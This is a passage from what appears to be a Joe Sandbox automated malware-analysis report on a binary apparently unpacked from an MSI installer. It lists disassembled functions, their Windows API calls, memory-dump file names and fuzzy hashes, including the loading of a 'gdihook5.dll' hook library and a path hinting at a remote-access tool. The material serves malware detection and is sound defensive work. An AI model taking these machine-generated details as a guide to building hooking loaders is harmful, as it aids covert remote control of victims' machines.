                                                                                                                        • Instruction Fuzzy Hash: E9214F72206245AFCB12DF5CD9849A87FF4EB45B44B4580DAE859DB362CB30EB02DB40
                                                                                                                        Function 00B16250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B1626D
                                                                                                                        • _memset.LIBCMT ref: 00B1628E
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 00B162CB
                                                                                                                        • CreatePopupMenu.USER32 ref: 00B162DA
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B16303
                                                                                                                        • InsertMenuItemW.USER32(?,00000000,00000001,00000030), ref: 00B16314
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B1631B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 74472576-4108050209
                                                                                                                        • Opcode ID: dcc2c8a77b7b349de0fbb904539f5b9a99ef37657bacbde28b80be283ab89ac8
                                                                                                                        • Instruction ID: 51123d3125fd918f02ee6d5b84aeb0275aef27d13803ddd39ee90017b365b31e
                                                                                                                        • Opcode Fuzzy Hash: dcc2c8a77b7b349de0fbb904539f5b9a99ef37657bacbde28b80be283ab89ac8
                                                                                                                        • Instruction Fuzzy Hash: D521B071801218ABCB219FA4DC8DBEEB7BCEB48304F5041D9F509A7191DBB85B84CFA0
                                                                                                                        Function 00B1A5E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A600
                                                                                                                        • wsprintfW.USER32 ref: 00B1A61A
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A630
                                                                                                                          • Part of subcall function 00B155B0: GetTickCount.KERNEL32 ref: 00B15618
                                                                                                                          • Part of subcall function 00B1A0F0: GetCurrentThreadId.KERNEL32 ref: 00B1A103
                                                                                                                          • Part of subcall function 00B1A0F0: wsprintfW.USER32 ref: 00B1A183
                                                                                                                          • Part of subcall function 00B1A0F0: IsBadReadPtr.KERNEL32(?,00000001), ref: 00B1A1A8
                                                                                                                          • Part of subcall function 00B1A0F0: wsprintfW.USER32 ref: 00B1A1C9
                                                                                                                          • Part of subcall function 00B1A0F0: wsprintfW.USER32 ref: 00B1A1E6
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A662
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00B1A665
                                                                                                                        • GetVersion.KERNEL32 ref: 00B1A670
                                                                                                                        • ExitProcess.KERNEL32 ref: 00B1A6B3
                                                                                                                          • Part of subcall function 00AFFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 00AFFF66
                                                                                                                          • Part of subcall function 00AFFF40: GetProcAddress.KERNEL32(00000000), ref: 00AFFF6D
                                                                                                                          • Part of subcall function 00AFFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 00AFFF83
                                                                                                                          • Part of subcall function 00B159F0: SetEvent.KERNEL32(00000208), ref: 00B15A0B
                                                                                                                        Strings
                                                                                                                        • Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump., xrefs: 00B1A614
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CurrentDebugErrorLastOutputProcessString$AddressCountEventExitHandleModuleProcReadThreadTickVersion
                                                                                                                        • String ID: Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump.
                                                                                                                        • API String ID: 465577698-2858110079
                                                                                                                        • Opcode ID: 16f9cc57f8c82202c2a59fa74d0e8675ce33ef34c6293e777ab85b85541ef456
                                                                                                                        • Instruction ID: 68bc0cc6a1230720bd481d3683776a9219c9586a0f2d8ee0547999ee87778b32
                                                                                                                        • Opcode Fuzzy Hash: 16f9cc57f8c82202c2a59fa74d0e8675ce33ef34c6293e777ab85b85541ef456
                                                                                                                        • Instruction Fuzzy Hash: AC119A75910314BBDB10BBE49D4AFDA77ACAF08710F4040D5F619A72D3EAB4AD40CBA6
                                                                                                                        Function 00B4E2A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • UnDecorator::UScore.LIBCMT ref: 00B4E2AA
                                                                                                                        • DName::DName.LIBCMT ref: 00B4E2B6
                                                                                                                          • Part of subcall function 00B4BF81: DName::doPchar.LIBCMT ref: 00B4BFB2
                                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 00B4E2F5
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E2FF
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E30E
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E31A
                                                                                                                        • DName::operator+=.LIBCMT ref: 00B4E327
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                        • String ID: void
                                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                                        • Opcode ID: b9dba41cc55965a23be8883cb6d3f3369340f701a810cc67b01a88abed27e3a7
                                                                                                                        • Instruction ID: 9cc6f6ce07f0c865b3a7162dd8082fb4bff1e8300b873498ef2155d44214a81e
                                                                                                                        • Opcode Fuzzy Hash: b9dba41cc55965a23be8883cb6d3f3369340f701a810cc67b01a88abed27e3a7
                                                                                                                        • Instruction Fuzzy Hash: 21115E70904204AEDB06EF68C89AAB9BBE0EF10700F0440D9F11AAB2E6DB70DB45DB40
                                                                                                                        Function 00B24720 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,0000042C), ref: 00B2472F
                                                                                                                          • Part of subcall function 00B23B00: SetWindowLongW.USER32(?,000000FC,?), ref: 00B23B0D
                                                                                                                        • _malloc.LIBCMT ref: 00B2474C
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _memset.LIBCMT ref: 00B24779
                                                                                                                        • __fread_nolock.LIBCMT ref: 00B2478A
                                                                                                                        • SendMessageW.USER32(00000000,0000000C,00000000,00000000), ref: 00B24798
                                                                                                                        • _free.LIBCMT ref: 00B2479F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeapItemLongMessageSendWindow__fread_nolock_free_malloc_memset
                                                                                                                        • String ID: buf$e:\nsmsrc\nsm\1410\1410\nt\winst32.c
                                                                                                                        • API String ID: 2839252642-821064217
                                                                                                                        • Opcode ID: e17b6de80a5dec5431f236f0ad6d6daf78f8492e9d8d9b63e2e7e02d8a5c1101
                                                                                                                        • Instruction ID: 0fdabfb6a8f88416ad641175147dd7a176f85664da9ed58385d77fcc093b25b0
                                                                                                                        • Opcode Fuzzy Hash: e17b6de80a5dec5431f236f0ad6d6daf78f8492e9d8d9b63e2e7e02d8a5c1101
                                                                                                                        • Instruction Fuzzy Hash: A0F0C8B2BC531536E92136646C8BF6F3ADCCF51F51F6040A0FB086A1C3DEE8590185B6
                                                                                                                        Function 00B62897 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00B6289E
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B628A8
                                                                                                                        • int.LIBCPMT ref: 00B628BF
                                                                                                                          • Part of subcall function 00AF0330: std::_Lockit::_Lockit.LIBCPMT ref: 00AF0341
                                                                                                                        • ctype.LIBCPMT ref: 00B628E2
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B628F6
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B62904
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 00B6291A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3532015510-3145022300
                                                                                                                        • Opcode ID: 8fa74f3bc7655a3a57045192659c6414d8706e49405d5effb00c5087cb3dc7b5
                                                                                                                        • Instruction ID: 42c574fac4c306ba5634c65cf5109fa02991cbb52b1ec35ed5f284a24973e9cc
                                                                                                                        • Opcode Fuzzy Hash: 8fa74f3bc7655a3a57045192659c6414d8706e49405d5effb00c5087cb3dc7b5
                                                                                                                        • Instruction Fuzzy Hash: C001A17290060997DF05E7A08D92EBDB3B4AF40B20F244198F5117B2D1DF3C9E058B90
                                                                                                                        Function 00B62DB0 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00B62DB7
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B62DC1
                                                                                                                        • int.LIBCPMT ref: 00B62DD8
                                                                                                                          • Part of subcall function 00AF0330: std::_Lockit::_Lockit.LIBCPMT ref: 00AF0341
                                                                                                                        • messages.LIBCPMT ref: 00B62DFB
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B62E0F
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B62E1D
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 00B62E33
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 2525416601-3145022300
                                                                                                                        • Opcode ID: 0a5b60a6bdd991a97c140e21ee1f4d13bb47abfce8ce4126331c033b80220237
                                                                                                                        • Instruction ID: 3c6204411084bbc893fd7c63ba63b0a80c43a6ed850716d9dc64ba9fc06822d2
                                                                                                                        • Opcode Fuzzy Hash: 0a5b60a6bdd991a97c140e21ee1f4d13bb47abfce8ce4126331c033b80220237
                                                                                                                        • Instruction Fuzzy Hash: 5501AD7290060997DF05EBA0CD52ABE73B4EF50B20F644298F5117B2E2DF389E068790
                                                                                                                        Function 00AFE750 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 37libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00AFE5E0: LoadLibraryW.KERNEL32(USER32), ref: 00AFE5F9
                                                                                                                        • GetDC.USER32(00000000), ref: 00AFE75C
                                                                                                                        • LoadLibraryW.KERNEL32(USER32,\gdihook5.dll), ref: 00AFE76E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00AFE780
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFE793
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AFE79C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressFreeProcRelease
                                                                                                                        • String ID: EnumDisplayMonitors$USER32$\gdihook5.dll
                                                                                                                        • API String ID: 959129003-2682909438
                                                                                                                        • Opcode ID: c28b2cf883a9b3fa7653ddd95f204dbb62a8e4b3d2ee900b7ca189020516a122
                                                                                                                        • Instruction ID: 63e8f8e9e4181fbbfe4c00269d9ff89ae5206beaeb9389c5685a278f07f308b8
                                                                                                                        • Opcode Fuzzy Hash: c28b2cf883a9b3fa7653ddd95f204dbb62a8e4b3d2ee900b7ca189020516a122
                                                                                                                        • Instruction Fuzzy Hash: 42F0893524171167DB1197B8BD99F6E7768DF84F11F040110FA05932F4EFB49801C795
                                                                                                                        Function 00B36841 Relevance: 13.6, APIs: 9, Instructions: 145librarymemoryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00B36886
                                                                                                                        • GetLastError.KERNEL32 ref: 00B36892
                                                                                                                        • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00B368C5
                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00B368D7
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 00B368EB
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B36908
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 00B3695E
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00B3696A
                                                                                                                        • RaiseException.KERNEL32(C06D007F,00000000,00000001,?,?,?), ref: 00B3699D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 991255547-0
                                                                                                                        • Opcode ID: dab0509c36500f4f342dfe227d7e2321d05da15df00a9d1a96f0132dc3fc6b71
                                                                                                                        • Instruction ID: dc23968e9ac8bff963173064905187219128dc785011546b6a4a18a6bb62210d
                                                                                                                        • Opcode Fuzzy Hash: dab0509c36500f4f342dfe227d7e2321d05da15df00a9d1a96f0132dc3fc6b71
                                                                                                                        • Instruction Fuzzy Hash: 72513A71A00206BFEB21CF94D984BAD77F4EF5C340F20816AE615D7290EBB0E905CB60
                                                                                                                        Function 00B16F10 Relevance: 13.6, APIs: 9, Instructions: 93windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B16F35
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B16F4A
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B16F4E
                                                                                                                        • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00B16F64
                                                                                                                        • SendMessageW.USER32(?,00000148,00000000,?), ref: 00B16F9D
                                                                                                                        • GetTextExtentPoint32W.GDI32(00000000,?,?,?), ref: 00B16FCF
                                                                                                                        • SendMessageW.USER32(?,00000160,?,00000000), ref: 00B17018
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B17022
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B1702B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ObjectSelect$ExtentPoint32ReleaseText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 583237262-0
                                                                                                                        • Opcode ID: ca739ddb9d486c866f4c91d2a23ef30ce71864682e894c3c2ec89ee83c62db4d
                                                                                                                        • Instruction ID: 4bcc6700ad686ae514c1cde46963e0e4fe639c7e4ad35b474a4a02d204f1c544
                                                                                                                        • Opcode Fuzzy Hash: ca739ddb9d486c866f4c91d2a23ef30ce71864682e894c3c2ec89ee83c62db4d
                                                                                                                        • Instruction Fuzzy Hash: B4312D71A40218ABDB609F64DD85FEAB7F8FF44700F10C1D5E549A7180DEB0AA858F90
                                                                                                                        Function 00B06BB0 Relevance: 13.6, APIs: 9, Instructions: 70memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06BB7
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00B06BEF
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06BFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocGlobalRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1459782005-0
                                                                                                                        • Opcode ID: 1f3947617f124ce5e36a0a02517453ce0717c2fb5fbea798380cec4af0fba2d2
                                                                                                                        • Instruction ID: 1c9821efa7cefa42f3069c9381377b7d2161fe3ced55bb992be7f9e73916efac
                                                                                                                        • Opcode Fuzzy Hash: 1f3947617f124ce5e36a0a02517453ce0717c2fb5fbea798380cec4af0fba2d2
                                                                                                                        • Instruction Fuzzy Hash: AA118D7260121467D7215B98BC49BEB77ACEB49761F004156FD09C32D0EFB94D1187F5
                                                                                                                        Function 00AFC180 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC18F
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1A9
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1B6
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1C3
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1D5
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1DF
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1F1
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC1FB
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00AFCAC6), ref: 00AFC208
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$Event$FileUnmapView
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427653990-0
                                                                                                                        • Opcode ID: 9658338d2bd0c9d43d32b1ba3b9d3c51b8f407f0723207572aeb4c003bf7e9e5
                                                                                                                        • Instruction ID: 0b5312c19ca5269b66d78988b45864f13208578e3d220db928b12a03e1160d6e
                                                                                                                        • Opcode Fuzzy Hash: 9658338d2bd0c9d43d32b1ba3b9d3c51b8f407f0723207572aeb4c003bf7e9e5
                                                                                                                        • Instruction Fuzzy Hash: F111ECB15007489FC7309FEA99C4866F7F8BE583203544E2EF286C3A51C674E8488E54
                                                                                                                        Function 00B03080 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcspbrk.LIBCMT ref: 00B03191
                                                                                                                          • Part of subcall function 00B02980: _memmove.LIBCMT ref: 00B02A2B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
